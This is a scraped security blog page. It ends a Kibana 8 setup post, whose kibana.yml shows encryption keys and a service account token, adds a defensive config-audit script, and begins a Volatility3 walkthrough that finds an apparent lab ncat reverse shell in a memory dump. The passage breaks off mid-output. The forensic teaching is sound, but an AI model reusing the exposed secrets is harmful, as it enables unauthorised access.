<span style="color: white;">securitynik@securitynik:~$ sudo systemctl status kibana.service</span>
<span style="color: white;">● kibana.service - Kibana</span>
<span style="color: white;"> Loaded: loaded (/lib/systemd/system/kibana.service; enabled; vendor preset: enabled)</span>
<span style="color: white;"> Active: active (running) since Wed 2022-03-30 22:56:14 EDT; 8s ago</span>
<span style="color: white;"> Docs: https://www.elastic.co</span>
<span style="color: white;"> Main PID: 102001 (node)</span>
<span style="color: white;"> Tasks: 11 (limit: 38298)</span>
<span style="color: white;"> Memory: 231.7M</span>
<span style="color: white;"> CGroup: /system.slice/kibana.service</span>
<span style="color: white;"> └─102001 /usr/share/kibana/bin/../node/bin/node /usr/share/kibana/bin/../src/cli/dist</span>
<span style="color: white;">Mar 30 22:56:14 securitynik systemd[1]: Started Kibana.</span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.275-04:00][INFO ][plugins-service] Plugin "metricsEntities" is disabled.</span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.345-04:00][INFO ][http.server.Preboot] http server running at http://192></span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.372-04:00][INFO ][plugins-system.preboot] Setting up [1] plugins: [inter></span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.374-04:00][INFO ][preboot] "interactiveSetup" plugin is holding setup: V></span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.399-04:00][INFO ][root] Holding setup until preboot stage is completed.</span>
<span><span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: </span><b><span style="color: #fcff01;">i Kibana has not been configured.</span></b></span>
<span><span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: </span><b><span style="color: #fcff01;">Go to http://10.0.0.4:5601/?code=452840 to get started.</span></b></span>
</pre></div>
</div><br />Open the URL identified above in a browser and add the previously created enrollment token for Kibana.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTwxFIjeepR3za2TNo4Da-w2-2kwdvBqZ-ISERIhu8kWn2YLhD-RZPG10LM9pUyehTDajAuka0HegoFUaEWqmPGu6TgOznrVr7wcKBjpbf7ekDlYRgmSWECdXWjIEBspDwcYXIgBe-Uj0ByqyRABQ5YjQSXyLCViQ6Mfh5X_SOv8cVBWmpyUhaRzI/s1393/Snapshot-%20for%20kibana%20token.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1393" data-original-width="1262" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTwxFIjeepR3za2TNo4Da-w2-2kwdvBqZ-ISERIhu8kWn2YLhD-RZPG10LM9pUyehTDajAuka0HegoFUaEWqmPGu6TgOznrVr7wcKBjpbf7ekDlYRgmSWECdXWjIEBspDwcYXIgBe-Uj0ByqyRABQ5YjQSXyLCViQ6Mfh5X_SOv8cVBWmpyUhaRzI/w363-h400/Snapshot-%20for%20kibana%20token.png" width="363" /></a></div><div><br /></div><div>Once the token is added, we should see the following.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh71iU2MzZZqmkisJolusZsjtxbDVF0OpLzRicqGLcktKT8LXBBzNQouZGd4l5erQbasj1J7EoPafjEBnj4SYf5-7Fn1MLVPAzQbZc8kL-NOJkE-OaA-fUkws6e31RZ3bL3RcSAPy-V8giLKB1FJUm8umuax9ayNmnz1e5wqvKcKtm37d68onXWAQaf/s1593/Snapshot-%20for%20kibana%20token%20-%20setup%20complete.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1593" data-original-width="1377" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh71iU2MzZZqmkisJolusZsjtxbDVF0OpLzRicqGLcktKT8LXBBzNQouZGd4l5erQbasj1J7EoPafjEBnj4SYf5-7Fn1MLVPAzQbZc8kL-NOJkE-OaA-fUkws6e31RZ3bL3RcSAPy-V8giLKB1FJUm8umuax9ayNmnz1e5wqvKcKtm37d68onXWAQaf/w346-h400/Snapshot-%20for%20kibana%20token%20-%20setup%20complete.png" width="346" /></a></div><div><br /></div><div>With the above completed successfully, 
it is time to log in to the UI using the initially created user.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXYWBCSWgPB8SXGt-74DNpOXRF4ICiuAgnzRxOcjVjjG10O2IA-uxsLGPLMTFX5GXZiPRbK0WrD0wVv8o882TdNQLVFOqHysoJjilHMV6mN5b_t32dcdk6QPNb_4FRKJc7Lo6j8snfhIcdDrK-Ef5iYEs7kL0Qv5Pd1e6QSTWNedRvAsSapmffPMu5/s1248/ELASTIC%20authentication.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1248" data-original-width="1107" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXYWBCSWgPB8SXGt-74DNpOXRF4ICiuAgnzRxOcjVjjG10O2IA-uxsLGPLMTFX5GXZiPRbK0WrD0wVv8o882TdNQLVFOqHysoJjilHMV6mN5b_t32dcdk6QPNb_4FRKJc7Lo6j8snfhIcdDrK-Ef5iYEs7kL0Qv5Pd1e6QSTWNedRvAsSapmffPMu5/w355-h400/ELASTIC%20authentication.png" width="355" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div>After all the changes, here is what my <i>kibana.yml</i> looks like.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo grep --perl-regexp --invert-match "^#" /etc/kibana/kibana.yml</span>
<span style="color: white;">server.host: "10.0.0.4"</span>
<span style="color: white;">server.publicBaseUrl: "http://10.0.0.4:5601"</span>
<span style="color: white;">server.name: "kibana.n3.local"</span>
<span style="color: white;">logging:</span>
<span style="color: white;"> appenders:</span>
<span style="color: white;"> file:</span>
<span style="color: white;"> type: file</span>
<span style="color: white;"> fileName: /var/log/kibana/kibana.log</span>
<span style="color: white;"> layout:</span>
<span style="color: white;"> type: json</span>
<span style="color: white;"> root:</span>
<span style="color: white;"> appenders:</span>
<span style="color: white;"> - default</span>
<span style="color: white;"> - file</span>
<span style="color: white;">pid.file: /run/kibana/kibana.pid</span>
<span style="color: white;">xpack.encryptedSavedObjects.encryptionKey: d2667a5634faf33053dbd40d91afa8c9</span>
<span style="color: white;">xpack.reporting.encryptionKey: f03f17de223aced044cd3afb42de4398</span>
<span style="color: white;">xpack.security.encryptionKey: f17be84bbaa17dc9cb8a06cb95e0f437</span>
<span style="color: white;">elasticsearch.hosts: ['https://10.0.0.4:9200']</span>
<span style="color: white;">elasticsearch.serviceAccountToken: BBEAAWVsYXN0aWMva2liYW5hL3Vucm9sbC1wcm9jZXNzLM2va2VuLTE2NDg2OTU1ODcwMDg6OVlHSWhfaFlRQXVzMFhVcWZqSTdNZw</span>
<span style="color: white;">elasticsearch.ssl.certificateAuthorities: [/var/lib/kibana/ca_1648695587748.crt]</span>
<span style="color: white;">xpack.fleet.outputs: [{id: fleet-default-output, name: default, is_default: true, is_default_monitoring: true, type: elasticsearch, hosts: ['https://10.0.0.4:9200'], ca_trusted_fingerprint: e224a19239031533623921f032b6a06e070d673964a43ff9d99e9977fb8526bd}]</span>
</pre></div>
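<p>The hardening that the <i>elasticsearch.yml</i> and <i>kibana.yml</i> listings above rely on (security enabled, TLS on both Elasticsearch layers, Kibana's three encryption keys, and Kibana talking to Elasticsearch over HTTPS with a pinned CA) is easy to lose in a later edit. The script below is an added example, not code from the post or from Elastic: it re-reads both files and reports any setting that has drifted. The two sample configurations are constructed from the values shown in the post (with the hosts list written in double quotes), and <i>yaml_top</i>, <i>yaml_sub</i>, <i>expect</i>, <i>audit_elasticsearch</i> and <i>audit_kibana</i> are the example's own names. It reports exactly one finding against the post's own <i>kibana.yml</i>: the Kibana UI itself is served over plain http (<i>server.publicBaseUrl</i> is http://10.0.0.4:5601 and <i>server.ssl.enabled</i> is not set), so browser sessions to port 5601, including the login shown above, are not encrypted.</p>

```shell
#!/usr/bin/env bash
# Added example (not from the original post): re-check the security-relevant
# settings in elasticsearch.yml and kibana.yml. The sample configs are
# constructed from the values shown in the post; the keys are illustrative.

SAMPLE_ES_YML='cluster.name: n3-elastic
network.host: securitynik.local
http.port: 9200
xpack.security.enabled: true
xpack.security.enrollment.enabled: true
xpack.security.http.ssl:
  enabled: true
  keystore.path: certs/http.p12
xpack.security.transport.ssl:
  enabled: true
  verification_mode: certificate
  keystore.path: certs/transport.p12
  truststore.path: certs/transport.p12'

SAMPLE_KIBANA_YML='server.host: "10.0.0.4"
server.publicBaseUrl: "http://10.0.0.4:5601"
xpack.encryptedSavedObjects.encryptionKey: d2667a5634faf33053dbd40d91afa8c9
xpack.reporting.encryptionKey: f03f17de223aced044cd3afb42de4398
xpack.security.encryptionKey: f17be84bbaa17dc9cb8a06cb95e0f437
elasticsearch.hosts: ["https://10.0.0.4:9200"]
elasticsearch.ssl.certificateAuthorities: [/var/lib/kibana/ca_1648695587748.crt]'

# yaml_top KEY  (stdin: yaml) -> value of the top-level "KEY: value" line, double quotes removed
yaml_top() {
  awk -v k="$1" 'index($0, k ":") == 1 {
      v = substr($0, length(k) + 2); sub(/^[ \t]+/, "", v); gsub(/"/, "", v); print v; exit }'
}

# yaml_sub BLOCK KEY  (stdin: yaml) -> value of the indented "KEY: value" line under "BLOCK:"
yaml_sub() {
  awk -v b="$1" -v k="$2" '
    /^[^ \t]/ { t = $0; sub(/[ \t]+$/, "", t); inb = (t == (b ":")); next }
    inb { l = $0; sub(/^[ \t]+/, "", l)
          if (index(l, k ":") == 1) {
            v = substr(l, length(k) + 2); sub(/^[ \t]+/, "", v); gsub(/"/, "", v); print v; exit } }'
}

# expect DESCRIPTION ACTUAL WANTED -> prints a finding and returns 1 on mismatch
expect() {
  [ "$2" = "$3" ] && return 0
  printf 'FINDING: %s: got "%s", want "%s"\n' "$1" "${2:-(unset)}" "$3"
  return 1
}

# audit_elasticsearch (stdin: elasticsearch.yml) -> returns the number of findings
audit_elasticsearch() {
  local cfg n=0 vm
  cfg=$(cat)
  expect "xpack.security.enabled" "$(printf '%s\n' "$cfg" | yaml_top xpack.security.enabled)" true || n=$((n + 1))
  expect "HTTP layer TLS" "$(printf '%s\n' "$cfg" | yaml_sub xpack.security.http.ssl enabled)" true || n=$((n + 1))
  expect "transport layer TLS" "$(printf '%s\n' "$cfg" | yaml_sub xpack.security.transport.ssl enabled)" true || n=$((n + 1))
  # "certificate" (what the autoconfiguration writes) validates the chain only; "full" also
  # checks the hostname. Either is acceptable here; "none" or an unset value is not.
  vm=$(printf '%s\n' "$cfg" | yaml_sub xpack.security.transport.ssl verification_mode)
  case "$vm" in
    certificate|full) ;;
    *) printf 'FINDING: transport verification_mode: got "%s", want certificate or full\n' "${vm:-(unset)}"; n=$((n + 1)) ;;
  esac
  # Binding every interface is rarely intended on a single-node install.
  [ "$(printf '%s\n' "$cfg" | yaml_top network.host)" != "0.0.0.0" ] \
    || { echo 'FINDING: network.host is 0.0.0.0 (listening on all interfaces)'; n=$((n + 1)); }
  return $n
}

# audit_kibana (stdin: kibana.yml) -> returns the number of findings
audit_kibana() {
  local cfg n=0 key v hosts
  cfg=$(cat)
  # Kibana requires each encryption key to be at least 32 characters long.
  for key in xpack.encryptedSavedObjects.encryptionKey xpack.reporting.encryptionKey xpack.security.encryptionKey; do
    v=$(printf '%s\n' "$cfg" | yaml_top "$key")
    [ "${#v}" -ge 32 ] || { printf 'FINDING: %s missing or shorter than 32 characters\n' "$key"; n=$((n + 1)); }
  done
  hosts=$(printf '%s\n' "$cfg" | yaml_top elasticsearch.hosts)
  case "$hosts" in
    *"http://"*|"") echo 'FINDING: elasticsearch.hosts is unset or includes a plain-http entry'; n=$((n + 1)) ;;
  esac
  [ -n "$(printf '%s\n' "$cfg" | yaml_top elasticsearch.ssl.certificateAuthorities)" ] \
    || { echo 'FINDING: elasticsearch.ssl.certificateAuthorities is not set'; n=$((n + 1)); }
  # The post leaves the Kibana UI on plain http (see server.publicBaseUrl); this check reports that.
  expect "server.ssl.enabled (Kibana UI over TLS)" "$(printf '%s\n' "$cfg" | yaml_top server.ssl.enabled)" true || n=$((n + 1))
  return $n
}

# Demonstration on the constructed samples.
# Real use: sudo cat /etc/elasticsearch/elasticsearch.yml | audit_elasticsearch
printf '%s\n' "$SAMPLE_ES_YML" | audit_elasticsearch || echo "elasticsearch.yml: $? finding(s)"
printf '%s\n' "$SAMPLE_KIBANA_YML" | audit_kibana || echo "kibana.yml: $? finding(s)"
```

<p>The two awk helpers only understand the flat and one-level-nested keys these files use, which is enough for the settings that matter here; anything more elaborate in the files is ignored rather than misread. Running the audit from a cron job or a CI step against the live files turns the post's one-off hardening into something that is checked every time the files change.</p>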
</div><div><br /></div><div><br /></div><div><div>References:</div><div><a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/deb.html">https://www.elastic.co/guide/en/elasticsearch/reference/current/deb.html</a></div><div><a href="https://www.linkedin.com/pulse/elasticsearch-8-express-installation-guide-pascal-thalmann/">https://www.linkedin.com/pulse/elasticsearch-8-express-installation-guide-pascal-thalmann/</a></div><div><a href="https://kifarunix.com/install-elk-stack-8-x-on-ubuntu/">https://kifarunix.com/install-elk-stack-8-x-on-ubuntu/</a></div><div><a href="https://www.elastic.co/guide/en/kibana/current/deb.html">https://www.elastic.co/guide/en/kibana/current/deb.html</a></div></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-5021614761646925082022-03-18T20:35:00.002-07:002022-03-18T20:35:55.233-07:00Beginning Volatility3 Memory Forensics<p>In this post, I'm taking a quick look at Volatility3, to understand its capabilities.</p><p>First up, obtaining Volatility3 via GitHub.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~]</span>
<span style="color: white;">└─$ git clone https://github.com/volatilityfoundation/volatility3.git</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Next up, get an image. For this, I will take a memory dump of my own virtual machine, using Comae's Toolkit DumpIt.exe</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\TMP</span>
<span><span style="color: white;">λ y:\Comae-Toolkit-Light-3.0.20180307.1\x64\</span><b><span style="color: #fcff01;">DumpIt.exe</span></b></span>
<span style="color: white;"> DumpIt 3.0.20180307.1</span>
<span style="color: white;"> Copyright (C) 2007 - 2017, Matthieu Suiche <http://www.msuiche.net></span>
<span style="color: white;"> Copyright (C) 2012 - 2014, MoonSols Limited <http://www.moonsols.com></span>
<span style="color: white;"> Copyright (C) 2015 - 2017, Comae Technologies FZE <http://www.comae.io></span>
<span style="color: white;"> Destination path: \</span><span style="color: #fcff01;">??\<b>C:\TMP\SECURITYNIK-WIN-20220225-182235.dmp</b></span>
<span style="color: white;"> Computer name: SECURITYNIK-WIN</span>
<span style="color: white;"> <b>--> Proceed with the acquisition ? [y/n] y</b></span>
<span style="color: white;"> [+] Information:</span>
<span style="color: white;"> Dump Type: Microsoft Crash Dump</span>
<span style="color: white;"> [+] Machine Information:</span>
<span style="color: white;"> Windows version: 10.0.19044</span>
<span style="color: white;"> MachineId: 88688394-D237-438C-92E3-06D84FF93CE9</span>
<span style="color: white;"> TimeStamp: 132902869567075443</span>
<span style="color: white;"> Cr3: 0x1aa000</span>
<span style="color: white;"> KdCopyDataBlock: 0xfffff8054df0e2e8</span>
<span style="color: white;"> KdDebuggerData: 0xfffff8054e603b20</span>
<span style="color: white;"> KdpDataBlockEncoded: 0xfffff8054e653b28</span>
<span style="color: white;"> Current date/time: [2022-02-25 (YYYY-MM-DD) 18:22:36 (UTC)]</span>
<span style="color: white;"> + Processing... Done.</span>
<span style="color: white;"> Acquisition finished at: [2022-02-25 (YYYY-MM-DD) 18:22:50 (UTC)]</span>
<span style="color: white;"> Time elapsed: 0:14 minutes:seconds (14 secs)</span>
<span style="color: white;"> Created file size: 2147020800 bytes (2047 Mb)</span>
<span style="color: white;"> Total physical memory size: 2047 Mb</span>
<span style="color: white;"> NtStatus (troubleshooting): 0x00000000</span>
<span style="color: white;"> Total of written pages: 524173</span>
<span style="color: white;"> Total of inacessible pages: 0</span>
<span style="color: white;"> Total of accessible pages: 524173</span>
<span style="color: white;"> SHA-256: A943219879526515F889BA2707699391132EC648E9C3B1B34C45A50DAB0BA6A3</span>
<span style="color: white;"> JSON path: C:\TMP\SECURITYNIK-WIN-20220225-182235.json</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Now that I have the memory image, the first step is to get some help on how to use the tool.</p><p>Set up a symbolic link for volatility3</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ </span><span style="color: #fcff01;"><b>sudo ln --symbolic ~/volatility3/vol.py /usr/bin/vol3</b></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Getting some help!</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">vol3 --help | more</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]]</span>
<span style="color: white;"> [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG]</span>
<span style="color: white;"> [-o OUTPUT_DIR] [-q] [-r RENDERER] [-f FILE]</span>
<span style="color: white;"> [--write-config] [--clear-cache] [--cache-path CACHE_PATH]</span>
<span style="color: white;"> [--offline] [--single-location SINGLE_LOCATION]</span>
<span style="color: white;"> [--stackers [STACKERS ...]]</span>
<span style="color: white;"> [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]]</span>
<span style="color: white;"> plugin ...</span>
<span style="color: white;">An open-source memory forensics framework</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div>With an understanding of the basic usage of the tool in place, time to use it. First up, getting information on the image.</div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.info.Info</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Variable Value</span>
<span style="color: white;">Kernel Base 0xf8054da03000</span>
<span style="color: white;">DTB 0x1aa000</span>
<span style="color: white;">Symbols file:///home/securitynik/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3177D31000BA7590DED335936C93E374-1.json.xz</span>
<span style="color: white;">Is64Bit True</span>
<span style="color: white;">IsPAE False</span>
<span style="color: white;">layer_name 0 WindowsIntel32e</span>
<span style="color: white;">memory_layer 1 WindowsCrashDump64Layer</span>
<span style="color: white;">base_layer 2 FileLayer</span>
<span style="color: white;">KdVersionBlock 0xf8054e612378</span>
<span style="color: white;">Major/Minor 15.19041</span>
<span style="color: white;">MachineType 34404</span>
<span style="color: white;">KeNumberProcessors 1</span>
<span style="color: white;">SystemTime 2022-02-25 18:22:36</span>
<span style="color: white;">NtSystemRoot C:\Windows</span>
<span style="color: white;">NtProductType NtProductWinNt</span>
<span style="color: white;">NtMajorVersion 10</span>
<span style="color: white;">NtMinorVersion 0</span>
<span style="color: white;">PE MajorOperatingSystemVersion 10</span>
<span style="color: white;">PE MinorOperatingSystemVersion 0</span>
<span style="color: white;">PE Machine 34404</span>
<span style="color: white;">PE TimeDateStamp Mon Jan 22 06:20:17 2103</span>
</pre></div>
<br /><div>Above, we can grab information such as the Windows version and the date the image was taken.</div><div><br /></div><div>Next up, looking at the processes which were running at the time this snapshot was taken. Below I've chosen to focus on <i>ncat.exe</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.pslist.PsList</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output</span>
<span style="color: white;">4 0 System 0xd187b9684040 111 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled</span>
<span style="color: white;">72 4 Registry 0xd187b9754040 4 - N/A False 2022-02-25 18:20:35.000000 N/A Disabled</span>
<span style="color: white;">352 4 smss.exe 0xd187bcf02080 3 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled</span>
<span style="color: white;">444 432 csrss.exe 0xd187c01ea140 11 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">512 432 wininit.exe 0xd187be054080 5 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">520 504 csrss.exe 0xd187be053140 11 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">580 504 winlogon.exe 0xd187be090080 6 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">604 512 services.exe 0xd187be097080 10 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">612 512 lsass.exe 0xd187be09d080 8 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">...</span>
<b><span style="color: #fcff01;"><span>4492 4756 ncat.exe 0xd187c11a5080 5 - 1 False 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>4500 4260 cmd.exe 0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span></span></b>
<span style="color: white;">4584 3960 DumpIt.exe 0xd187c1f81080 6 - 1 False 2022-02-25 18:22:35.000000 N/A Disabled</span>
<span style="color: white;">4636 748 WmiPrvSE.exe 0xd187c1e430c0 11 - 0 False 2022-02-25 18:22:36.000000 N/A Disabled</span>
</pre></div>
</div><div><br /></div><div>Looking at the processes via the <i>psscan</i> plugin.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.psscan.PsScan</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output</span>
<span style="color: white;">4 0 System 0xd187b9684040 111 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled</span>
<span style="color: white;">72 4 Registry 0xd187b9754040 4 - N/A False 2022-02-25 18:20:35.000000 N/A Disabled</span>
<span style="color: white;">352 4 smss.exe 0xd187bcf02080 3 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled</span>
<span style="color: white;">520 504 csrss.exe 0xd187be053140 11 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">512 432 wininit.exe 0xd187be054080 5 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">580 504 winlogon.exe 0xd187be090080 6 - 1 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">604 512 services.exe 0xd187be097080 10 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">612 512 lsass.exe 0xd187be09d080 8 - 0 False 2022-02-25 18:20:39.000000 N/A Disabled</span>
<span style="color: white;">...</span>
<b><span style="color: #fcff01;"><span>4492 4756 ncat.exe 0xd187c11a5080 5 - 1 False 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>...</span>
<span>3960 3304 cmd.exe 0xd187c1aed080 3 - 1 False 2022-02-25 18:21:10.000000 N/A Disabled</span>
<span>4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>...</span>
<span>4500 4260 cmd.exe 0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span>
<span>4756 4696 cmd.exe 0xd187c1cef080 4 - 1 False 2022-02-25 18:21:55.000000 N/A Disabled</span></span></b>
<span style="color: white;">...</span>
<span style="color: white;">4584 3960 DumpIt.exe 0xd187c1f81080 6 - 1 False 2022-02-25 18:22:35.000000 N/A Disabled</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the established network connections during the time of acquisition with a focus on the process associated with <i>ncat.exe</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.netstat.NetStat</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created</span>
<b><span style="color: #fcff01;"><span>0xd187bff9e730 TCPv4 10.0.0.102 49671 10.0.0.110 9999 ESTABLISHED 4260 ncat.exe 2022-02-25 18:22:18.000000 </span>
</span></b><span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div>Above, there is one established connection with process <i>PID 4260</i>. I will come back to this shortly. Taking another look at the network statistics.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.netscan.NetScan </span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created</span>
<span style="color: white;">0xd187b9697b50 TCPv4 0.0.0.0 5357 0.0.0.0 0 LISTENING 4 System 2022-02-25 18:20:41.000000 </span>
<span style="color: white;">0xd187b9697b50 TCPv6 :: 5357 :: 0 LISTENING 4 System 2022-02-25 18:20:41.000000 </span>
<span style="color: white;">0xd187b9697cb0 TCPv4 0.0.0.0 49668 0.0.0.0 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 </span>
<span style="color: white;">0xd187bc7a0050 TCPv4 10.0.0.102 139 0.0.0.0 0 LISTENING 4 System 2022-02-25 18:20:40.000000 </span>
